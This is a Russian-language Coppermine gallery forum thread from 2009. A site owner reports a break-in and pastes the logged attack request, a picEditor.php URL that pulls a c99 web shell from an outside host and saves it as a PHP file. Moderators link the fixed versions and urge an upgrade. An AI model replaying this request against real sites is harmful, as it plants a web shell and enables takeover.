Advanced search  

News:

CPG Release 1.6.26
Correct PHP8.2 issues with user and language managers.
Additional fixes for PHP 8.2
Correct PHP8 error with SMF 2.0 bridge.
Correct IPTC supplimental category parsing.
Download and info HERE

Pages: [1]   Go Down

Author Topic: Срочно ! Взломали фотогалерею. Привожу при  (Read 5436 times)

0 Members and 1 Guest are viewing this topic.

pansionat

  • Coppermine newbie
  • Offline Offline
  • Posts: 13

Срочно ! Взломали фотогалерею. К сожалению не очень сильно знаю английский. Но вот привожу лог залива постороних файлов через дырку в скрипте:
мой сайт/picEditor.php?img_dir=http://xakforum.altnet.ru/tmp_upload/files/c99shell.txt&CURRENT_PIC[filename]=/1.php

Надеюсь подправят уязвимость 
« Last Edit: February 04, 2009, 07:41:45 pm by Makc666 »
Logged

MISHA

  • Coppermine frequent poster
  • ***
  • Country: ru
  • Offline Offline
  • Gender: Male
  • Posts: 262

версия 4.18 ? вроде там была уязвимость
Logged
Что бы Ктулху не воскрес, подпишись на RSS

pansionat

  • Coppermine newbie
  • Offline Offline
  • Posts: 13
Re: Уязвимость в picEditor.php
« Reply #2 on: February 03, 2009, 04:54:37 pm »

У меня версия этого файла 1.4.16
Но дело в том, что я сравнил файлы версий и разница тольв этом
Версия 1.4.16
<? starttable("100%", $lang_editpics_php['crop_title'], 3); ?>

Версия 1.4.19
<?php starttable("100%", $lang_editpics_php['crop_title'],?>

Неужели такое незначительное изменение устраняет проблему ?
Logged

MISHA

  • Coppermine frequent poster
  • ***
  • Country: ru
  • Offline Offline
  • Gender: Male
  • Posts: 262

я в этом полный ноль, советую обновить.
Logged
Что бы Ктулху не воскрес, подпишись на RSS

Makc666

  • Moderator
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 1614
  • Русский (ISO-8859-1) - Russian - Русский (Windows)
    • Makc's home page

То, что у Вас сделали, это уязвимость найденная и исправленная в версии 1.4.17
http://forum.coppermine-gallery.net/index.php/topic,51787.0.html

Также была и версия 1.4.19, которая тоже имела дыру:
http://forum.coppermine-gallery.net/index.php/topic,54235.0.html

Хочу обратить внимание, что уже вышла новая версия 1.4.20, где была исправлена серьезная уязвимость версии 1.4.19!
« Last Edit: February 24, 2009, 11:23:16 pm by Makc666 »
Logged
Pages: [1]   Go Up
 

Page created in 0.024 seconds with 20 queries.